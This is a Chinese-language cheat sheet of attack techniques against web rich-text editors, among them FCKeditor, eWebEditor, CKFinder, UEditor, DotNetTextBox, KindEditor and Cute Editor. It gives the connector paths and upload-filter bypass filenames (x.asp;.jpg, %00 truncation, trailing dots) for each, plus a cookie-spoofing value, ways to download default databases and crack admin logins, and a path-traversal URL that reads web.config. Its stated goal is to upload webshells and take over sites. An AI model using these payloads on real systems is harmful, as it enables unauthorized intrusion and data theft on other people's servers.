常见编辑器漏洞

编辑器利用

查找编辑器目录

• 目录扫描
• 目录遍历
• 蜘蛛爬行          

漏洞利用

• 百度相关编辑器漏洞利用

FCKeditor编辑器页/查看编辑器版本/查看文件上传路径

• FCKeditor编辑器页
• FCKeditor/_samples/default.html
• 查看编辑器版本
• FCKeditor/_whatsnew.html
• 查看文件上传路径
• fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

查看上传目录

• XML页面中第二行"url=/xxx"的部分就是默认基准上传路径
• FCKeditror被动限制策略所导致的过滤不严问题
• 影响版本:FCKeditor x.x <= FCKeditor v2.4.3

脆弱性描述

• FCKeditor v2.4.3中File类别默认拒绝上传类型
• html |htm| php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
• pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
• Fckeditor 2.0 <=2.2 允许上传asa、cer、php2、php4、inc、pwnl、pht后缀的文件
• 上传后 它保存的文件直接用的$sFilePath =$sServerDir.$sFileName,而没有使用$sExtension为后缀
• 直接导致在win下在上传文件后面加个.来突破
• 而在apache下，因为"Apache文件名解析缺陷漏洞”也可以利用之

漏洞版本

• windows有任意文件上传漏洞如x.asp;.jpg
• Apache+linux环境下在上传文件后面加个.突破!测试通过

Version <=2.4.2 For php

在处理PHP在上传的地方并未对media类型进行进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件，修改action地址

action="http://www.site.com/FCKeditor/editor?filemanage/upload/php/upload.php?Type=Media" method="post">Upload a new file:

FCKeditor 文件上传“.”变“_”下划线的绕过方法

• 很多时候上传的文件例如: shell.php.rar 或者shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化
• 提交shell.php+空格绕过
• 不过空格只支持win系统*nix是不支持的[shell.php 和shell.php+空格是2个不同的文件 未测试
• 继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录，如果跳到二级目录就不受限制

突破建立文件夹

 

 FCKeditor_2.5/editor/filemanager/connectors/asp/connector.aspCommand=Createfolder&Type=Image&Currentfolder=/xx.asp&NewFoldername=x.asp

FCKeditor中test文件的上传地址

• FCKeditor/editor/filemanager/browser/default/connectors/test.html
• FCKeditor/editor/filemanager/upload/test.html
• FCKeditor/editor/filemanager/connectors/test.html
• FCKeditor/editor/filemanager/connectors/uploadtest.html

绕过asp;.jpg变asp_jpg

• 使用特殊名称绕过
• a.aspx.a;.a.aspx.jpg..jpg.aspx
• xx.asp.;.jpg

EWEbeditor

1.进后台   

• 通过弱口令
• 下载默认数据库   ewebeditor/db/ewebeditor.mdb
• burp抓包爆破
• 利用注入点得到密码

如果没有后台

利用目录遍历漏洞，找网站数据库位置下载网站数据库，登录网站后台拿shell

利用exp进行

构造上传

2.修改上传类型

3.自己添加上传样式以后添加上传按钮一一上传

CKFinder

任意文件上传漏洞

• 其1.4.3 asp.net版本存在任意文件上传漏洞，攻击者可以利用该漏洞上传任意文件，CKFinder在上传文件的时候，强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制，从而导致可以上传1_php;1.jpg等畸形文件名，最终导致文件上传漏洞
• 然后修改文件名
• 1_php;1.jpg
• 利用iis6.0目录解析漏洞拿shell
• 创建目录/x.asp/
• 在目录下上传图片马即可拿shell

南方数据编辑器southidceditor

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式，增加asa(不要asp).然后直接后台编辑新闻上传

UEDITOR

• 利用ii6.0文件名解析漏洞
• 上传图片改名为
• x.php;20221.jpg获取shell

DotNetTextBox编辑器漏洞

• 关键字:system_dntb/
• 确定有system_dntb/uploadimg.aspx并能打开，这时候是不能上传的，由于他是验证cookie来得出上传后的路径，这样我们可以用cookie欺骗工具
• cookie:UserType=0;IsEdition=0;Info=1;
• uploadFolder=../system_dntb/Upload/;
• 路径可以修改，只要权限够，上传后改名为1.asp;.jpg利用iis解析漏洞

PHPWEB网站管理系统后台Kedit编辑器

• 两种利用方式
• 第一种是利用iis6.0文件名解析漏洞
• xx.php;xx.jpg
• 第二种方式
• %00截断
• xx.php%00jpg

Cute Editor 在线编辑器本地包含漏洞

• 影响版本：
• Cute Editor For Net 6.4
• 脆弱描述
• 可以随意查看网站文件内容，危害较大
• 攻击利用

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

等等编辑器漏洞，其余特殊编辑器漏洞，需要时可自行百度查找他们的漏洞